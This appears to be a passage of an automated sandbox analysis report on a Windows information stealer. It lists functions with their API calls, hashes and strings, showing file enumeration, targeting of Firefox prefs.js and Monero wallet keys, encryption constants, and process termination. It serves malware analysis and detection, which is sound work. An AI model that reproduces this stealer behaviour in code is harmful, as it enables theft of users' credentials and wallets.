                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: f1ac76fd45e3905b6ba6e070806418f91cd63f749c5d7ac6ccf5962099e7cc85
                                        • Instruction ID: 9fc321038c3832f721794bd2fc9cd3d33d42431a40d4ba15bb9309ca82b79411
                                        • Opcode Fuzzy Hash: f1ac76fd45e3905b6ba6e070806418f91cd63f749c5d7ac6ccf5962099e7cc85
                                        • Instruction Fuzzy Hash: 11614976900218ABCF24EBA0EC45FEA737CBB59701F4045D8F60996151EB70EB89CF95
                                        Function 001947C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001947D0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001947D7
                                        • wsprintfA.USER32 ref: 001947F6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0019480D
                                        • StrCmpCA.SHLWAPI(?,001A0FAC), ref: 0019483B
                                        • StrCmpCA.SHLWAPI(?,001A0FB0), ref: 00194851
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 001948DB
                                        • FindClose.KERNEL32(000000FF), ref: 001948F0
                                        • lstrcat.KERNEL32(?,011CE928), ref: 00194915
                                        • lstrcat.KERNEL32(?,011CD660), ref: 00194928
                                        • lstrlen.KERNEL32(?), ref: 00194935
                                        • lstrlen.KERNEL32(?), ref: 00194946
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: af8ae7b2573ca1537df8194735f56f9a705e103f8720d463926f223034c0ac5d
                                        • Instruction ID: 3981bfd326445ad4bc20c886f44dd031b7de5665eca0bdda159db3f3ee4f0507
                                        • Opcode Fuzzy Hash: af8ae7b2573ca1537df8194735f56f9a705e103f8720d463926f223034c0ac5d
                                        • Instruction Fuzzy Hash: 3B517671904208ABCB24EB70EC89FED737CAB58301F4045E8F64A96151EB70DB85CF95
                                        Function 001940F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00194113
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0019412A
                                        • StrCmpCA.SHLWAPI(?,001A0F94), ref: 00194158
                                        • StrCmpCA.SHLWAPI(?,001A0F98), ref: 0019416E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 001942BC
                                        • FindClose.KERNEL32(000000FF), ref: 001942D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: 9a216a689a3b7d67b8dbdd2c5c6975bb7871fa3fa92300214e02ce65b6df2eae
                                        • Instruction ID: ec8795819df628cfd283a680f1c51d236d477cef6ede7db05ee95185529776d4
                                        • Opcode Fuzzy Hash: 9a216a689a3b7d67b8dbdd2c5c6975bb7871fa3fa92300214e02ce65b6df2eae
                                        • Instruction Fuzzy Hash: D95178B2504218ABCF24EBB0DC45EEE737CBB58301F4045E8B60A96051DB70EB89CF94
                                        Function 0018EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 0018EE3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0018EE55
                                        • StrCmpCA.SHLWAPI(?,001A1630), ref: 0018EEAB
                                        • StrCmpCA.SHLWAPI(?,001A1634), ref: 0018EEC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0018F3AE
                                        • FindClose.KERNEL32(000000FF), ref: 0018F3C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: eb29c45f5c07e6705fa1dcd0af55d3ee6be8cb1075fcbbfe42bd7453b4c97c1d
                                        • Instruction ID: f16bc6e0eeb787eba461d8ebc69716348b569a104537a39d8cfbb841c338a7f0
                                        • Opcode Fuzzy Hash: eb29c45f5c07e6705fa1dcd0af55d3ee6be8cb1075fcbbfe42bd7453b4c97c1d
                                        • Instruction Fuzzy Hash: 91E1DD729111189ADF54FB60DDA2EEE7379AF64300F8045E9B50B66092EF306B8DCF91
                                        Function 001C0098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                        • API String ID: 0-1562099544
                                        • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction ID: 07a724bf9b30352eb69f79812a93cd11989686a9540e04375399aa31d7a75ebb
                                        • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction Fuzzy Hash: 9FE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                        Function 0018F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001A16B0,001A0D97), ref: 0018F81E
                                        • StrCmpCA.SHLWAPI(?,001A16B4), ref: 0018F86F
                                        • StrCmpCA.SHLWAPI(?,001A16B8), ref: 0018F885
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0018FBB1
                                        • FindClose.KERNEL32(000000FF), ref: 0018FBC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: fc9c2922d0162f05a5c2957f887f2333d1a1f9dcde29ddcac2f7fe648a73cd07
                                        • Instruction ID: ea8e293697da086d26f7954f3689974bec344524a14ac3be895e7600c79cb3e1
                                        • Opcode Fuzzy Hash: fc9c2922d0162f05a5c2957f887f2333d1a1f9dcde29ddcac2f7fe648a73cd07
                                        • Instruction Fuzzy Hash: 0AB1F072A001189BCF24FF64DD96AEE7379AF65300F4085A8A50A57191EF30AB4DCFD6
                                        Function 00181710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001A523C,?,?,?,001A52E4,?,?,00000000,?,00000000), ref: 00181963
                                        • StrCmpCA.SHLWAPI(?,001A538C), ref: 001819B3
                                        • StrCmpCA.SHLWAPI(?,001A5434), ref: 001819C9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00181D80
                                        • DeleteFileA.KERNEL32(00000000), ref: 00181E0A
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00181E60
                                        • FindClose.KERNEL32(000000FF), ref: 00181E72
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: d8dede45fb1eac220a38f2a9d99cfcb77046e294211926439a38aa0cf32e9dbb
                                        • Instruction ID: f33793ade995cf1ffe1fc2d1a4e2bb96d8dc09274d152c8929c05982646cb1d9
                                        • Opcode Fuzzy Hash: d8dede45fb1eac220a38f2a9d99cfcb77046e294211926439a38aa0cf32e9dbb
                                        • Instruction Fuzzy Hash: 5712C0729141189BCF15FB60CCA6AEE7379AF65300F8045D9B50B66091EF306B8DCF91
                                        Function 0018DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,001A0C32), ref: 0018DF5E
                                        • StrCmpCA.SHLWAPI(?,001A15C0), ref: 0018DFAE
                                        • StrCmpCA.SHLWAPI(?,001A15C4), ref: 0018DFC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0018E4E0
                                        • FindClose.KERNEL32(000000FF), ref: 0018E4F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: f90353c5aee2f1751c980c18464c89d3518eebe8b4729d30bb6cae809da382fc
                                        • Instruction ID: cfc62d30287167b6fb3efba7828ab727bb76cbcf10dc41f0cd601fec7d3ab0a6
                                        • Opcode Fuzzy Hash: f90353c5aee2f1751c980c18464c89d3518eebe8b4729d30bb6cae809da382fc
                                        • Instruction Fuzzy Hash: ABF189719141189ACF29FB60DDA6EEE7379BF65300F8045E9A10B62091EF306B8DCF95
                                        Function 0018DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001A15A8,001A0BAF), ref: 0018DBEB
                                        • StrCmpCA.SHLWAPI(?,001A15AC), ref: 0018DC33
                                        • StrCmpCA.SHLWAPI(?,001A15B0), ref: 0018DC49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0018DECC
                                        • FindClose.KERNEL32(000000FF), ref: 0018DEDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 4e76ae1226e8d86ff57c16858c884e214542d36f4cdc071bea9f12548a538041
                                        • Instruction ID: 7eae528f83f1a8bc47c4257237effa50959e096390384deb8a1e165b6de257d8
                                        • Opcode Fuzzy Hash: 4e76ae1226e8d86ff57c16858c884e214542d36f4cdc071bea9f12548a538041
                                        • Instruction Fuzzy Hash: 0C91E172A002049BCF14FB74ED569ED737DAFA5340F4046A8B90756181EF34AB4C8BD6
                                        Function 001998E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00199905
                                        • Process32First.KERNEL32(00189FDE,00000128), ref: 00199919
                                        • Process32Next.KERNEL32(00189FDE,00000128), ref: 0019992E
                                        • StrCmpCA.SHLWAPI(?,00189FDE), ref: 00199943
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019995C
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0019997A
                                        • CloseHandle.KERNEL32(00000000), ref: 00199987
                                        • CloseHandle.KERNEL32(00189FDE), ref: 00199993
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
